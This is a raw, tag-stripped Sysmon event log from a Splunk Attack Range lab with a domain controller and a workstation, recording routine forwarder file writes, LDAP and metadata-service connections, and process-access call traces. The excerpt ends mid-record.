Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=670241953126C45ACC72B1DC2D20837A,SHA256=E36B476FB1A118B14A12D8F23BD54EFADAF00FF926884513E6085AB693B5084A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061033Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:05.169{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7534A9D29297B525462A6134753AAB57,SHA256=B8EC0288387561A84EBEFA2595881A38719459F4D11FCBD4F1571F1FFBE7954F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245763Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:05.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E45983BBC912F7F71D580CFB5D83D682,SHA256=BBEA06875F0A9D0AEE920950C438A12123B8C98FB865A1FE7BED40188E93C549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061045Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:06.529{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D1B67615CC8A6029B92DE2066D9BFF,SHA256=2EAFBE87D533C94933C3540E0DE22FBE22594640E74774D30413ECF2418AF483,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061044Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.817{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-877.attackrange.local54793-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061043Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.817{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54793-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061042Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.816{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-877.attackrange.local54792-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061041Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.816{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54792-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061040Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.815{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-877.attackrange.local54791-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061039Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.815{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54791-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061038Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.815{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-877.attackrange.local54790-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061037Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.815{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54790-false10.0.1.14win-dc-877.attackrange.local389ldap 354300x80000000000000001061036Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.812{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54789-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local389ldap 354300x80000000000000001061035Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.812{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54789-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local389ldap 354300x80000000000000001061034Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:03.014{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54788-false10.0.1.12-8000- 23542300x8000000000000000245764Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:06.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFAD60EF20AC0F8E45A248A1B570631,SHA256=B03ACCA3D2192976CFCE788A0797C1E65BFBEDE0A542703E4066B37CA2F81799,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061046Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:07.888{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B39AABF7B2E25C2D94464AC277ED44,SHA256=A982F8C0FEFA0617EE3844383F97B7384408561AEC4A3C1D16AD0C5C76E8AC02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245765Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:07.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A38468040DAC34350715F1BFA312A79,SHA256=4E0A9EFEC94428C7A8A137476B3FB773897A05851BC0829D4838EE20D65AD307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245766Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:08.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=984C882CF450FA09C907FF04B0BBCBC7,SHA256=4713294EBAA2C79F53D06989569F51A4C8ED1851057233A34B6F532137FA3E14,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061050Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:07.055{7F8C56E7-4E4E-6063-4600-00000000AF01}3328C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54796-false169.254.169.254-80http 354300x80000000000000001061049Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:07.001{7F8C56E7-4E4E-6063-4600-00000000AF01}3328C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54795-false169.254.169.254-80http 354300x80000000000000001061048Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:07.000{7F8C56E7-4E4E-6063-4600-00000000AF01}3328C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54794-false169.254.169.254-80http 23542300x80000000000000001061047Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:09.244{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8C3B2861FDA721E35AB84AF85E9EE13,SHA256=325B84339BAD63C846715D55A63C35F7D7CB10C4E71230467314FFCBBFC6FFAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245770Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:09.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3E62A09FE1EE60EBBB89DACD1FE7266,SHA256=8C2CE365290C5F85077A4C5A85624DC722F0E2AA2796F72D5227540733250459,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245769Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:08.547{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64777-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245768Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:09.116{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AC0C44852870953666E427900B635B2,SHA256=716A765AB16EE8FA2B37228AA93821A625A32D03697F180B1B5D0915794CD8EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245767Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:09.116{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D400E9EDAF0B6E6C42824E3EAB797A07,SHA256=A5F6736B93E40DD221E5CD69CBDB3321DC74C5BF9FAE635747F00DA62B5BD139,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061052Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:07.165{7F8C56E7-4E4E-6063-4600-00000000AF01}3328C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54797-false169.254.169.254-80http 23542300x80000000000000001061051Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:10.605{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7F75EB3AB5E589A4E86CB74976A6FAD,SHA256=F974BBA51D9A219C124C3C6B04EFDDDDD20F6CF53D620120D3F31ED71F236F96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245771Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:10.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58218BF40DFB9C1D56BDD3E2E4BD5541,SHA256=5B944C32D6E9F797CE0BF8B846F5E1A1FA51ED20BFA47E9CF9DD267278EF9060,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061054Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:11.948{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7BEA84B2B8961CF6D0E2C7E66A7FEEF,SHA256=4D746F26908E2ACD6B78CD6B5E1FE4C186F56838EC283E97B0C31CA0407A95D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061053Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:08.887{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54798-false10.0.1.12-8000- 23542300x8000000000000000245772Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:11.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA7E21425FC8FAE8BA9C0500BD3C14AF,SHA256=B554A50D8F3D2C0D707997ACA9642EBD033A8FC5C8E1501B5F4E09B43E8F6E23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061055Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:12.636{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F32016A3368E74466D65992C920F2CB9,SHA256=F7F19E0983772C46629F15A92BC271D15532F9CDCED96B193A2F1FDD441E285A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245773Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:12.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AE3BBAEF517A473C9EC5FBC7C4960D4,SHA256=C8295511CEA6E007568EC7A426A6BD95E6A18371FDDAD414D49C6DE67739A14F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061056Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:13.324{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54E2613268A67826F2A9DA69BA00AC41,SHA256=3DF97E3E236B440699295DD896A39D8C1A1E8BC67F166CFF5C15BB410ED74903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245774Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:13.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2051675476DBDD39E8CE96023221A20,SHA256=BFF9877780390D59C86411A3C53E7F6698E6C7D879304C905870904D3B029136,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245775Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:14.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC5E643A7D509A8E984E9C8F94151CE2,SHA256=69B9F7354EDCEDA04432012C29A9207211D7AC9C61387F78FA457D9F405F5D2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061057Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:15.324{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C30ECD4A77B3A5EF0E88C400034E1DDF,SHA256=4A1E66C0702F8C9DCA59052D67BDCBB07732851FC3A48DA0A5E86C6F527ECDCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245779Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:15.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0742022BBAAD49760A06CD41296BDD53,SHA256=E07AD1C6EE077A0553225D8102E051C375130CD91353635F53277575D518D40B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245778Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:14.516{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64778-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245777Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:15.085{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EE91A67DEB46DB6EB7EFF232DEE0566,SHA256=6ADD2933A8ABD0AE1C013AC26DA6273B67ADF61F83919055C33A2A5F182F3CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245776Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:15.085{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AC0C44852870953666E427900B635B2,SHA256=716A765AB16EE8FA2B37228AA93821A625A32D03697F180B1B5D0915794CD8EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061059Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:14.074{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54799-false10.0.1.12-8000- 23542300x80000000000000001061058Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:16.324{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBDE6316E940E929F61199B2C9508885,SHA256=7BFCD79345607ED84A14D1EBFC6A026BE3493F6CFD6D24883CDE63987AD2620B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245780Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:16.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9207BE3BBF59DC31B290EA03155B0C28,SHA256=3EA96E7ECBCE29721DA622956CA2B6D179D0A19D9064E1823CA3F1900D105A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061060Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:17.715{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B72B2FC9C51671838003626E1E35270,SHA256=E7B9A319F478DCF172902599A82B0350C9D91E7BAE1CEEAC5F5C6E4FE3268258,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245781Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:17.975{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE5B893D633E1BD94A4538C48970D15,SHA256=6F184E2CFCFDAD3BF91B615AAC910F83F0C88F466FE32122B780B517028D4D1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245782Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:18.988{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D28133C61C3D7599803637E582965AA3,SHA256=7680B016122F19CA75F4D2AAE5163D5A442786BCF9CC3F814BEDA820D0740638,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061081Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.887{7F8C56E7-51DF-6063-2101-00000000AF01}56602396C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061080Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.762{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51DF-6063-2101-00000000AF01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061079Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.762{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061078Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.762{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061077Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 